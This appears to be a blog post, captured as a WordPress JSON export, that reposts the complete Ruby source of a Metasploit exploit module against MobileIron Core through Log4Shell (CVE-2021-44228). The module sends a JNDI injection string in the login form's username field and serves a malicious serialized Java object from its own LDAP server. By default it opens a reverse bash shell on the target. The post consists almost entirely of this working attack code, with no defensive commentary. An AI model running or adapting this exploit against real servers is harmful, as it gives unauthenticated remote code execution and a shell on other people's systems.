##
\n# This module requires Metasploit: https:\/\/metasploit.com\/download
\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
\n##
\nclass MetasploitModule < Msf::Exploit::Remote
\nRank = ExcellentRanking<\/p>\n
include Msf::Exploit::Remote::Log4Shell
\ninclude Msf::Exploit::Remote::HttpClient
\nprepend Msf::Exploit::Remote::AutoCheck<\/p>\n
def initialize(_info = {})
\nsuper(
\n‘Name’ => ‘MobileIron Core Unauthenticated JNDI Injection RCE (via Log4Shell)’,
\n‘Description’ => %q{
\nMobileIron Core is affected by the Log4Shell vulnerability whereby a JNDI string sent to the server
\nwill cause it to connect to the attacker and deserialize a malicious Java object. This results in OS
\ncommand execution in the context of the tomcat user.<\/p>\n
This module will start an LDAP server that the target will need to connect to.
\n},
\n‘Author’ => [
\n‘Spencer McIntyre’, # JNDI\/LDAP lib stuff
\n‘RageLtMan <rageltman[at]sempervictus>’, # JNDI\/LDAP lib stuff
\n‘rwincey’, # discovered log4shell vector in MobileIron
\n‘jbaines-r7’ # wrote this module
\n],
\n‘References’ => [
\n[ ‘CVE’, ‘2021-44228’ ],
\n[ ‘URL’, ‘https:\/\/attackerkb.com\/topics\/in9sPR2Bzt\/cve-2021-44228-log4shell\/rapid7-analysis’],
\n[ ‘URL’, ‘https:\/\/forums.ivanti.com\/s\/article\/Security-Bulletin-CVE-2021-44228-Remote-code-injection-in-Log4j?language=en_US’ ],
\n[ ‘URL’, ‘https:\/\/www.mandiant.com\/resources\/mobileiron-log4shell-exploitation’ ]\n],
\n‘DisclosureDate’ => ‘2021-12-12’,
\n‘License’ => MSF_LICENSE,
\n‘DefaultOptions’ => {
\n‘RPORT’ => 443,
\n‘SSL’ => true,
\n‘SRVPORT’ => 389,
\n‘WfsDelay’ => 30
\n},
\n‘Targets’ => [
\n[
\n‘Linux’, {
\n‘Platform’ => ‘unix’,
\n‘Arch’ => [ARCH_CMD],
\n‘DefaultOptions’ => {
\n‘PAYLOAD’ => ‘cmd\/unix\/reverse_bash’
\n}
\n},
\n]\n],
\n‘Notes’ => {
\n‘Stability’ => [CRASH_SAFE],
\n‘SideEffects’ => [IOC_IN_LOGS],
\n‘AKA’ => [‘Log4Shell’, ‘LogJam’],
\n‘Reliability’ => [REPEATABLE_SESSION],
\n‘RelatedModules’ => [
\n‘auxiliary\/scanner\/http\/log4shell_scanner’,
\n‘exploit\/multi\/http\/log4shell_header_injection’
\n]\n}
\n)
\nregister_options([
\nOptString.new(‘TARGETURI’, [ true, ‘Base path’, ‘\/’])
\n])
\nend<\/p>\n
def wait_until(&block)
\ndatastore[‘WfsDelay’].times do
\nbreak if block.call<\/p>\n
sleep(1)
\nend
\nend<\/p>\n
def check
\nvalidate_configuration!<\/p>\n
vprint_status(‘Attempting to trigger the jndi callback…’)<\/p>\n
start_service
\nres = trigger
\nreturn Exploit::CheckCode::Unknown(‘No HTTP response was received.’) if res.nil?<\/p>\n
wait_until { @search_received }
\n@search_received ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Unknown(‘No LDAP search query was received.’)
\nensure
\ncleanup_service
\nend<\/p>\n
def build_ldap_search_response_payload
\nreturn [] if @search_received<\/p>\n
@search_received = true<\/p>\n
return [] unless @exploiting<\/p>\n
print_good(‘Delivering the serialized Java object to execute the payload…’)
\nbuild_ldap_search_response_payload_inline(‘CommonsBeanutils1’)
\nend<\/p>\n
def trigger
\n@search_received = false<\/p>\n
send_request_cgi(
\n‘method’ => ‘POST’,
\n‘uri’ => normalize_uri(target_uri, ‘mifs’, ‘j_spring_security_check’),
\n‘headers’ => {
\n‘Referer’ => “https:\/\/#{rhost}#{normalize_uri(target_uri, ‘mifs’, ‘user’, ‘login.jsp’)}”
\n},
\n‘encode’ => false,
\n‘vars_post’ => {
\n‘j_username’ => log4j_jndi_string,
\n‘j_password’ => Rex::Text.rand_text_alphanumeric(8),
\n‘logincontext’ => ’employee’
\n}
\n)
\nend<\/p>\n
def exploit
\nvalidate_configuration!
\n@exploiting = true
\nstart_service
\nres = trigger
\nfail_with(Failure::Unreachable, ‘Failed to trigger the vulnerability’) if res.nil?
\nfail_with(Failure::UnexpectedReply, ‘The server replied to the trigger in an unexpected way’) unless res.code == 302<\/p>\n
wait_until { @search_received && (!handler_enabled? || session_created?) }
\nhandler
\nend
\nend<\/p>\n","protected":false},"excerpt":{"rendered":"
## # This module requires Metasploit: https:\/\/metasploit.com\/download # Current source: https:\/\/github.com\/rapid7\/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Log4Shell include Msf::Exploit::Remote::HttpClient prepend Msf::Exploit::Remote::AutoCheck def initialize(_info = {}) super( ‘Name’ => ‘MobileIron Core Unauthenticated JNDI Injection RCE (via Log4Shell)’, ‘Description’ => %q{ MobileIron Core is affected by the Log4Shell vulnerability whereby a JNDI string …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-28913","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/28913","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=28913"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/28913\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=28913"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=28913"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=28913"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}